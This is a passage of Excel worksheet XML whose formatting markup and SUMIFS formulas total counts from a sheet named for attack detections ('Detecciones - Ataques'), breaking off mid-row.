    <mergeCell ref="ED8:EG8"/>
    <mergeCell ref="EO8:EQ8"/>
    <mergeCell ref="EW8:EZ8"/>
    <mergeCell ref="FN8:FQ8"/>
    <mergeCell ref="DW12:DY12"/>
    <mergeCell ref="DW18:DZ18"/>
    <mergeCell ref="DW22:DX22"/>
  </mergeCells>
  <conditionalFormatting sqref="DS9:DS22">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FF57BB8A"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="DP9:DP22">
    <cfRule type="colorScale" priority="2">
      <colorScale>
        <cfvo type="formula" val="0"/>
        <cfvo type="formula" val="0.5"/>
        <cfvo type="max"/>
        <color rgb="FFFFFFFF"/>
        <color rgb="FFF3BEB9"/>
        <color rgb="FFE67C73"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>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9.88"/>
    <col customWidth="1" min="4" max="4" width="15.63"/>
    <col customWidth="1" min="5" max="5" width="17.5"/>
    <col customWidth="1" min="108" max="108" width="35.75"/>
    <col customWidth="1" min="109" max="109" width="21.38"/>
    <col customWidth="1" min="110" max="110" width="37.5"/>
    <col customWidth="1" min="111" max="114" width="37.88"/>
    <col customWidth="1" min="115" max="117" width="26.5"/>
    <col customWidth="1" min="118" max="118" width="19.25"/>
    <col customWidth="1" min="119" max="119" width="22.5"/>
    <col customWidth="1" min="122" max="124" width="18.63"/>
    <col customWidth="1" min="125" max="125" width="30.5"/>
    <col customWidth="1" min="127" max="127" width="24.88"/>
    <col customWidth="1" min="128" max="177" width="23.63"/>
  </cols>
  <sheetData>
    <row r="3">
      <c r="EP3" s="701"/>
      <c r="EQ3" s="701"/>
      <c r="ER3" s="701"/>
      <c r="ES3" s="701"/>
      <c r="ET3" s="701"/>
      <c r="EU3" s="701"/>
      <c r="EV3" s="701"/>
      <c r="EW3" s="701"/>
      <c r="EX3" s="701"/>
      <c r="EY3" s="701"/>
      <c r="EZ3" s="701"/>
      <c r="FA3" s="701"/>
      <c r="FB3" s="701"/>
      <c r="FC3" s="701"/>
      <c r="FD3" s="701"/>
      <c r="FE3" s="701"/>
      <c r="FF3" s="701"/>
      <c r="FG3" s="701"/>
      <c r="FH3" s="701"/>
      <c r="FI3" s="701"/>
      <c r="FJ3" s="701"/>
      <c r="FK3" s="701"/>
      <c r="FL3" s="701"/>
      <c r="FM3" s="701"/>
      <c r="FN3" s="701"/>
      <c r="FO3" s="701"/>
      <c r="FP3" s="701"/>
      <c r="FQ3" s="701"/>
      <c r="FR3" s="701"/>
      <c r="FS3" s="701"/>
      <c r="FT3" s="701"/>
      <c r="FU3" s="701"/>
    </row>
    <row r="4">
      <c r="EP4" s="702"/>
      <c r="EQ4" s="703"/>
      <c r="ER4" s="703"/>
      <c r="ES4" s="703"/>
      <c r="ET4" s="703"/>
      <c r="EU4" s="703"/>
      <c r="EV4" s="703"/>
      <c r="EW4" s="703"/>
      <c r="EX4" s="703"/>
      <c r="EY4" s="703"/>
      <c r="EZ4" s="703"/>
      <c r="FA4" s="703"/>
      <c r="FB4" s="703"/>
      <c r="FC4" s="703"/>
      <c r="FD4" s="703"/>
      <c r="FE4" s="703"/>
      <c r="FF4" s="703"/>
      <c r="FG4" s="703"/>
      <c r="FH4" s="703"/>
      <c r="FI4" s="703"/>
      <c r="FJ4" s="703"/>
      <c r="FK4" s="703"/>
      <c r="FL4" s="703"/>
      <c r="FM4" s="703"/>
      <c r="FN4" s="703"/>
      <c r="FO4" s="703"/>
      <c r="FP4" s="703"/>
      <c r="FQ4" s="703"/>
      <c r="FR4" s="703"/>
      <c r="FS4" s="703"/>
      <c r="FT4" s="703"/>
      <c r="FU4" s="703"/>
    </row>
    <row r="5">
      <c r="EP5" s="702"/>
      <c r="EQ5" s="703"/>
      <c r="ER5" s="703"/>
      <c r="ES5" s="703"/>
      <c r="ET5" s="703"/>
      <c r="EU5" s="703"/>
      <c r="EV5" s="703"/>
      <c r="EW5" s="703"/>
      <c r="EX5" s="703"/>
      <c r="EY5" s="703"/>
      <c r="EZ5" s="703"/>
      <c r="FA5" s="703"/>
      <c r="FB5" s="703"/>
      <c r="FC5" s="703"/>
      <c r="FD5" s="703"/>
      <c r="FE5" s="703"/>
      <c r="FF5" s="703"/>
      <c r="FG5" s="703"/>
      <c r="FH5" s="703"/>
      <c r="FI5" s="703"/>
      <c r="FJ5" s="703"/>
      <c r="FK5" s="703"/>
      <c r="FL5" s="703"/>
      <c r="FM5" s="703"/>
      <c r="FN5" s="703"/>
      <c r="FO5" s="703"/>
      <c r="FP5" s="703"/>
      <c r="FQ5" s="703"/>
      <c r="FR5" s="703"/>
      <c r="FS5" s="703"/>
      <c r="FT5" s="703"/>
      <c r="FU5" s="703"/>
    </row>
    <row r="6">
      <c r="EP6" s="702"/>
      <c r="EQ6" s="703"/>
      <c r="ER6" s="703"/>
      <c r="ES6" s="703"/>
      <c r="ET6" s="703"/>
      <c r="EU6" s="703"/>
      <c r="EV6" s="703"/>
      <c r="EW6" s="703"/>
      <c r="EX6" s="703"/>
      <c r="EY6" s="703"/>
      <c r="EZ6" s="703"/>
      <c r="FA6" s="703"/>
      <c r="FB6" s="703"/>
      <c r="FC6" s="703"/>
      <c r="FD6" s="703"/>
      <c r="FE6" s="703"/>
      <c r="FF6" s="703"/>
      <c r="FG6" s="703"/>
      <c r="FH6" s="703"/>
      <c r="FI6" s="703"/>
      <c r="FJ6" s="703"/>
      <c r="FK6" s="703"/>
      <c r="FL6" s="703"/>
      <c r="FM6" s="703"/>
      <c r="FN6" s="703"/>
      <c r="FO6" s="703"/>
      <c r="FP6" s="703"/>
      <c r="FQ6" s="703"/>
      <c r="FR6" s="703"/>
      <c r="FS6" s="703"/>
      <c r="FT6" s="703"/>
      <c r="FU6" s="703"/>
    </row>
    <row r="7">
      <c r="D7" s="288" t="s">
        <v>2431</v>
      </c>
      <c r="E7" s="290"/>
      <c r="F7" s="573"/>
      <c r="G7" s="291" t="s">
        <v>2632</v>
      </c>
      <c r="H7" s="292"/>
      <c r="I7" s="292"/>
      <c r="J7" s="292"/>
      <c r="K7" s="292"/>
      <c r="L7" s="292"/>
      <c r="M7" s="292"/>
      <c r="N7" s="292"/>
      <c r="O7" s="292"/>
      <c r="P7" s="292"/>
      <c r="Q7" s="292"/>
      <c r="R7" s="292"/>
      <c r="S7" s="292"/>
      <c r="T7" s="292"/>
      <c r="U7" s="293"/>
      <c r="W7" s="294" t="s">
        <v>2632</v>
      </c>
      <c r="X7" s="292"/>
      <c r="Y7" s="292"/>
      <c r="Z7" s="292"/>
      <c r="AA7" s="292"/>
      <c r="AB7" s="292"/>
      <c r="AC7" s="292"/>
      <c r="AD7" s="292"/>
      <c r="AE7" s="292"/>
      <c r="AF7" s="292"/>
      <c r="AG7" s="292"/>
      <c r="AH7" s="292"/>
      <c r="AI7" s="292"/>
      <c r="AJ7" s="292"/>
      <c r="AK7" s="292"/>
      <c r="AL7" s="292"/>
      <c r="AM7" s="292"/>
      <c r="AN7" s="292"/>
      <c r="AO7" s="292"/>
      <c r="AP7" s="292"/>
      <c r="AQ7" s="292"/>
      <c r="AR7" s="292"/>
      <c r="AS7" s="292"/>
      <c r="AT7" s="292"/>
      <c r="AU7" s="292"/>
      <c r="AV7" s="292"/>
      <c r="AW7" s="292"/>
      <c r="AX7" s="292"/>
      <c r="AY7" s="292"/>
      <c r="AZ7" s="292"/>
      <c r="BA7" s="292"/>
      <c r="BB7" s="292"/>
      <c r="BC7" s="292"/>
      <c r="BD7" s="292"/>
      <c r="BE7" s="292"/>
      <c r="BF7" s="292"/>
      <c r="BG7" s="292"/>
      <c r="BH7" s="292"/>
      <c r="BI7" s="292"/>
      <c r="BJ7" s="292"/>
      <c r="BK7" s="292"/>
      <c r="BL7" s="292"/>
      <c r="BM7" s="292"/>
      <c r="BN7" s="292"/>
      <c r="BO7" s="292"/>
      <c r="BP7" s="292"/>
      <c r="BQ7" s="292"/>
      <c r="BR7" s="292"/>
      <c r="BS7" s="292"/>
      <c r="BT7" s="292"/>
      <c r="BU7" s="292"/>
      <c r="BV7" s="292"/>
      <c r="BW7" s="292"/>
      <c r="BX7" s="292"/>
      <c r="BY7" s="292"/>
      <c r="BZ7" s="292"/>
      <c r="CA7" s="292"/>
      <c r="CB7" s="292"/>
      <c r="CC7" s="292"/>
      <c r="CD7" s="292"/>
      <c r="CE7" s="292"/>
      <c r="CF7" s="292"/>
      <c r="CG7" s="292"/>
      <c r="CH7" s="292"/>
      <c r="CI7" s="292"/>
      <c r="CJ7" s="292"/>
      <c r="CK7" s="292"/>
      <c r="CL7" s="292"/>
      <c r="CM7" s="292"/>
      <c r="CN7" s="292"/>
      <c r="CO7" s="292"/>
      <c r="CP7" s="292"/>
      <c r="CQ7" s="292"/>
      <c r="CR7" s="292"/>
      <c r="CS7" s="292"/>
      <c r="CT7" s="292"/>
      <c r="CU7" s="292"/>
      <c r="CV7" s="292"/>
      <c r="CW7" s="292"/>
      <c r="CX7" s="292"/>
      <c r="CY7" s="293"/>
      <c r="CZ7" s="574"/>
      <c r="DA7" s="574"/>
      <c r="DB7" s="574"/>
      <c r="DC7" s="574"/>
      <c r="DD7" s="575" t="s">
        <v>2633</v>
      </c>
      <c r="DE7" s="3"/>
      <c r="DF7" s="282" t="s">
        <v>2695</v>
      </c>
      <c r="DG7" s="704" t="s">
        <v>2696</v>
      </c>
      <c r="DH7" s="705" t="s">
        <v>2697</v>
      </c>
      <c r="DI7" s="705" t="s">
        <v>2698</v>
      </c>
      <c r="DJ7" s="705" t="s">
        <v>2699</v>
      </c>
      <c r="DK7" s="706" t="s">
        <v>2700</v>
      </c>
      <c r="DL7" s="706" t="s">
        <v>2701</v>
      </c>
      <c r="DM7" s="706" t="s">
        <v>2702</v>
      </c>
      <c r="DN7" s="707" t="s">
        <v>2703</v>
      </c>
      <c r="DO7" s="707" t="s">
        <v>2704</v>
      </c>
      <c r="DP7" s="705" t="s">
        <v>2515</v>
      </c>
      <c r="DR7" s="580"/>
      <c r="DS7" s="580"/>
      <c r="DT7" s="582" t="s">
        <v>2705</v>
      </c>
      <c r="DU7" s="3"/>
      <c r="DV7" s="574"/>
      <c r="DW7" s="582" t="s">
        <v>2643</v>
      </c>
      <c r="DX7" s="3"/>
      <c r="DY7" s="580"/>
      <c r="DZ7" s="580"/>
      <c r="EA7" s="580"/>
      <c r="EP7" s="708"/>
      <c r="EQ7" s="709"/>
      <c r="ER7" s="709"/>
      <c r="ES7" s="709"/>
      <c r="ET7" s="709"/>
      <c r="EU7" s="709"/>
      <c r="EV7" s="709"/>
      <c r="EW7" s="709"/>
      <c r="EX7" s="703"/>
      <c r="EY7" s="703"/>
      <c r="EZ7" s="703"/>
      <c r="FA7" s="703"/>
      <c r="FB7" s="703"/>
      <c r="FC7" s="703"/>
      <c r="FD7" s="703"/>
      <c r="FE7" s="703"/>
      <c r="FF7" s="703"/>
      <c r="FG7" s="703"/>
      <c r="FH7" s="703"/>
      <c r="FI7" s="703"/>
      <c r="FJ7" s="703"/>
      <c r="FK7" s="703"/>
      <c r="FL7" s="703"/>
      <c r="FM7" s="703"/>
      <c r="FN7" s="703"/>
      <c r="FO7" s="703"/>
      <c r="FP7" s="703"/>
      <c r="FQ7" s="703"/>
      <c r="FR7" s="703"/>
      <c r="FS7" s="703"/>
      <c r="FT7" s="703"/>
      <c r="FU7" s="703"/>
    </row>
    <row r="8">
      <c r="D8" s="497" t="s">
        <v>2443</v>
      </c>
      <c r="E8" s="499" t="s">
        <v>2444</v>
      </c>
      <c r="G8" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="H8" s="316" t="s">
        <v>2093</v>
      </c>
      <c r="I8" s="316" t="s">
        <v>2013</v>
      </c>
      <c r="J8" s="316" t="s">
        <v>951</v>
      </c>
      <c r="K8" s="316" t="s">
        <v>633</v>
      </c>
      <c r="L8" s="316" t="s">
        <v>1725</v>
      </c>
      <c r="M8" s="316" t="s">
        <v>244</v>
      </c>
      <c r="N8" s="316" t="s">
        <v>427</v>
      </c>
      <c r="O8" s="316" t="s">
        <v>1373</v>
      </c>
      <c r="P8" s="316" t="s">
        <v>209</v>
      </c>
      <c r="Q8" s="316" t="s">
        <v>664</v>
      </c>
      <c r="R8" s="316" t="s">
        <v>357</v>
      </c>
      <c r="S8" s="316" t="s">
        <v>310</v>
      </c>
      <c r="T8" s="316" t="s">
        <v>292</v>
      </c>
      <c r="U8" s="317" t="s">
        <v>558</v>
      </c>
      <c r="W8" s="315" t="s">
        <v>2447</v>
      </c>
      <c r="X8" s="318" t="s">
        <v>2108</v>
      </c>
      <c r="Y8" s="319" t="s">
        <v>2177</v>
      </c>
      <c r="Z8" s="318" t="s">
        <v>2193</v>
      </c>
      <c r="AA8" s="318" t="s">
        <v>2095</v>
      </c>
      <c r="AB8" s="318" t="s">
        <v>2074</v>
      </c>
      <c r="AC8" s="318" t="s">
        <v>2061</v>
      </c>
      <c r="AD8" s="318" t="s">
        <v>2015</v>
      </c>
      <c r="AE8" s="318" t="s">
        <v>953</v>
      </c>
      <c r="AF8" s="318" t="s">
        <v>1040</v>
      </c>
      <c r="AG8" s="318" t="s">
        <v>1012</v>
      </c>
      <c r="AH8" s="318" t="s">
        <v>1164</v>
      </c>
      <c r="AI8" s="318" t="s">
        <v>1848</v>
      </c>
      <c r="AJ8" s="318" t="s">
        <v>2300</v>
      </c>
      <c r="AK8" s="318" t="s">
        <v>1138</v>
      </c>
      <c r="AL8" s="318" t="s">
        <v>974</v>
      </c>
      <c r="AM8" s="318" t="s">
        <v>1108</v>
      </c>
      <c r="AN8" s="318" t="s">
        <v>1702</v>
      </c>
      <c r="AO8" s="318" t="s">
        <v>1626</v>
      </c>
      <c r="AP8" s="320" t="s">
        <v>636</v>
      </c>
      <c r="AQ8" s="318" t="s">
        <v>1726</v>
      </c>
      <c r="AR8" s="318" t="s">
        <v>822</v>
      </c>
      <c r="AS8" s="318" t="s">
        <v>445</v>
      </c>
      <c r="AT8" s="318" t="s">
        <v>1747</v>
      </c>
      <c r="AU8" s="318" t="s">
        <v>989</v>
      </c>
      <c r="AV8" s="318" t="s">
        <v>246</v>
      </c>
      <c r="AW8" s="318" t="s">
        <v>2242</v>
      </c>
      <c r="AX8" s="318" t="s">
        <v>1282</v>
      </c>
      <c r="AY8" s="318" t="s">
        <v>429</v>
      </c>
      <c r="AZ8" s="318" t="s">
        <v>912</v>
      </c>
      <c r="BA8" s="318" t="s">
        <v>1837</v>
      </c>
      <c r="BB8" s="318" t="s">
        <v>1510</v>
      </c>
      <c r="BC8" s="318" t="s">
        <v>1411</v>
      </c>
      <c r="BD8" s="318" t="s">
        <v>1397</v>
      </c>
      <c r="BE8" s="318" t="s">
        <v>1374</v>
      </c>
      <c r="BF8" s="318" t="s">
        <v>677</v>
      </c>
      <c r="BG8" s="318" t="s">
        <v>790</v>
      </c>
      <c r="BH8" s="318" t="s">
        <v>262</v>
      </c>
      <c r="BI8" s="318" t="s">
        <v>771</v>
      </c>
      <c r="BJ8" s="318" t="s">
        <v>724</v>
      </c>
      <c r="BK8" s="318" t="s">
        <v>211</v>
      </c>
      <c r="BL8" s="318" t="s">
        <v>805</v>
      </c>
      <c r="BM8" s="318" t="s">
        <v>932</v>
      </c>
      <c r="BN8" s="318" t="s">
        <v>1306</v>
      </c>
      <c r="BO8" s="318" t="s">
        <v>1903</v>
      </c>
      <c r="BP8" s="318" t="s">
        <v>2335</v>
      </c>
      <c r="BQ8" s="318" t="s">
        <v>1983</v>
      </c>
      <c r="BR8" s="318" t="s">
        <v>1999</v>
      </c>
      <c r="BS8" s="318" t="s">
        <v>1971</v>
      </c>
      <c r="BT8" s="318" t="s">
        <v>1201</v>
      </c>
      <c r="BU8" s="318" t="s">
        <v>750</v>
      </c>
      <c r="BV8" s="318" t="s">
        <v>666</v>
      </c>
      <c r="BW8" s="318" t="s">
        <v>892</v>
      </c>
      <c r="BX8" s="318" t="s">
        <v>1214</v>
      </c>
      <c r="BY8" s="318" t="s">
        <v>1293</v>
      </c>
      <c r="BZ8" s="318" t="s">
        <v>1331</v>
      </c>
      <c r="CA8" s="318" t="s">
        <v>2215</v>
      </c>
      <c r="CB8" s="318" t="s">
        <v>2261</v>
      </c>
      <c r="CC8" s="318" t="s">
        <v>359</v>
      </c>
      <c r="CD8" s="318" t="s">
        <v>1230</v>
      </c>
      <c r="CE8" s="318" t="s">
        <v>1812</v>
      </c>
      <c r="CF8" s="318" t="s">
        <v>1958</v>
      </c>
      <c r="CG8" s="318" t="s">
        <v>1667</v>
      </c>
      <c r="CH8" s="318" t="s">
        <v>505</v>
      </c>
      <c r="CI8" s="318" t="s">
        <v>312</v>
      </c>
      <c r="CJ8" s="318" t="s">
        <v>2289</v>
      </c>
      <c r="CK8" s="318" t="s">
        <v>411</v>
      </c>
      <c r="CL8" s="318" t="s">
        <v>1361</v>
      </c>
      <c r="CM8" s="318" t="s">
        <v>701</v>
      </c>
      <c r="CN8" s="318" t="s">
        <v>586</v>
      </c>
      <c r="CO8" s="318" t="s">
        <v>294</v>
      </c>
      <c r="CP8" s="318" t="s">
        <v>339</v>
      </c>
      <c r="CQ8" s="318" t="s">
        <v>370</v>
      </c>
      <c r="CR8" s="318" t="s">
        <v>394</v>
      </c>
      <c r="CS8" s="318" t="s">
        <v>1687</v>
      </c>
      <c r="CT8" s="318" t="s">
        <v>486</v>
      </c>
      <c r="CU8" s="318" t="s">
        <v>1889</v>
      </c>
      <c r="CV8" s="318" t="s">
        <v>1187</v>
      </c>
      <c r="CW8" s="318" t="s">
        <v>560</v>
      </c>
      <c r="CX8" s="318" t="s">
        <v>1175</v>
      </c>
      <c r="CY8" s="321" t="s">
        <v>1926</v>
      </c>
      <c r="CZ8" s="403"/>
      <c r="DA8" s="403"/>
      <c r="DB8" s="403"/>
      <c r="DC8" s="403"/>
      <c r="DD8" s="586" t="s">
        <v>2448</v>
      </c>
      <c r="DE8" s="587" t="s">
        <v>2496</v>
      </c>
      <c r="DF8" s="588" t="s">
        <v>2515</v>
      </c>
      <c r="DG8" s="710" t="s">
        <v>2706</v>
      </c>
      <c r="DH8" s="710" t="s">
        <v>2707</v>
      </c>
      <c r="DI8" s="710" t="s">
        <v>2708</v>
      </c>
      <c r="DJ8" s="710" t="s">
        <v>2709</v>
      </c>
      <c r="DK8" s="711" t="s">
        <v>2710</v>
      </c>
      <c r="DL8" s="711" t="s">
        <v>2710</v>
      </c>
      <c r="DM8" s="588" t="s">
        <v>2515</v>
      </c>
      <c r="DN8" s="712" t="s">
        <v>2706</v>
      </c>
      <c r="DO8" s="712" t="s">
        <v>2711</v>
      </c>
      <c r="DP8" s="588" t="s">
        <v>2515</v>
      </c>
      <c r="DR8" s="592"/>
      <c r="DS8" s="592"/>
      <c r="DT8" s="593" t="s">
        <v>2448</v>
      </c>
      <c r="DU8" s="594" t="s">
        <v>2496</v>
      </c>
      <c r="DV8" s="403"/>
      <c r="DW8" s="593" t="s">
        <v>2448</v>
      </c>
      <c r="DX8" s="594" t="s">
        <v>2496</v>
      </c>
      <c r="DY8" s="592" t="s">
        <v>2712</v>
      </c>
      <c r="DZ8" s="592"/>
      <c r="EA8" s="592"/>
      <c r="EF8" s="576" t="s">
        <v>2713</v>
      </c>
      <c r="EG8" s="221"/>
      <c r="EH8" s="221"/>
      <c r="EI8" s="222"/>
      <c r="EJ8" s="574"/>
      <c r="EK8" s="574"/>
      <c r="EL8" s="574"/>
      <c r="EM8" s="574"/>
      <c r="EN8" s="574"/>
      <c r="EO8" s="574"/>
      <c r="EP8" s="713"/>
      <c r="EQ8" s="714"/>
      <c r="ER8" s="715" t="s">
        <v>2647</v>
      </c>
      <c r="ES8" s="2"/>
      <c r="ET8" s="2"/>
      <c r="EU8" s="716"/>
      <c r="EV8" s="716"/>
      <c r="EW8" s="717"/>
      <c r="EX8" s="714"/>
      <c r="EY8" s="714"/>
      <c r="EZ8" s="600" t="s">
        <v>2648</v>
      </c>
      <c r="FA8" s="221"/>
      <c r="FB8" s="221"/>
      <c r="FC8" s="222"/>
      <c r="FD8" s="403"/>
      <c r="FE8" s="403"/>
      <c r="FF8" s="403"/>
      <c r="FG8" s="403"/>
      <c r="FH8" s="403"/>
      <c r="FI8" s="403"/>
      <c r="FJ8" s="403"/>
      <c r="FK8" s="403"/>
      <c r="FL8" s="403"/>
      <c r="FM8" s="403"/>
      <c r="FN8" s="403"/>
      <c r="FO8" s="403"/>
      <c r="FP8" s="403"/>
      <c r="FQ8" s="600" t="s">
        <v>2649</v>
      </c>
      <c r="FR8" s="221"/>
      <c r="FS8" s="221"/>
      <c r="FT8" s="222"/>
      <c r="FU8" s="403"/>
    </row>
    <row r="9">
      <c r="D9" s="434">
        <f>SUM('(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>247720</v>
      </c>
      <c r="E9" s="354">
        <f>SUM('(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>185276</v>
      </c>
      <c r="F9" s="350"/>
      <c r="G9" s="497" t="s">
        <v>2461</v>
      </c>
      <c r="H9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>9461</v>
      </c>
      <c r="I9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="J9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>252</v>
      </c>
      <c r="K9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>39</v>
      </c>
      <c r="L9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="M9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="N9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>22</v>
      </c>
      <c r="O9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>9923</v>
      </c>
      <c r="P9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>727</v>
      </c>
      <c r="Q9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>333</v>
      </c>
      <c r="R9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>148</v>
      </c>
      <c r="S9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>66858</v>
      </c>
      <c r="T9" s="601">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>114</v>
      </c>
      <c r="U9" s="602">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>1046</v>
      </c>
      <c r="W9" s="497" t="s">
        <v>2461</v>
      </c>
      <c r="X9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>9394</v>
      </c>
      <c r="Y9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>59</v>
      </c>
      <c r="AA9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>7</v>
      </c>
      <c r="AB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>6951</v>
      </c>
      <c r="AC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
        <v>0</v>
      </c>
      <c r="AD9" s="173">
